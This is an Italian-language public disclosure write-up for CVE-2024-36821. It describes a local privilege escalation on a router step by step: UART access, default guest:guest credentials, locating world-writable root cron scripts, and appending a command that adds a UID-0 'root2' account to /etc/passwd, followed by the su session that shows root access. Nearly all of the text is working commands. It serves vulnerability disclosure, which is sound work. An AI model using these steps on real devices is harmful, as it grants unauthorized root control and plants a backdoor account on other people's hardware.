
Il riferimento pubblico che contiene le informazioni minime richieste per la vulnerabilità coperta da CVE-2024-36821
Il riferimento pubblico che contiene le informazioni minime richieste per la vulnerabilità coperta da CVE-2024-36821
Connettersi al router tramite connessione UART
Usando le credenziali guest:guest, accedere al sistema
Usando il comando find / -perm -777 -type f 2>/dev/null, trovare i file con permessi di lettura-scrittura-esecuzione:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
Controllare il proprietario con il comando ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
Generare la password con il comando openssl passwd Abracadabra
Modificare /tmp/cron/cron.everyminute/conntrack_collector.sh, aggiungendo alla fine la nuova password generata:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
Attendere un minuto
Passare all'utente root2 con il seguente comando
/ $ su root2
Password: Abracadabra
~ #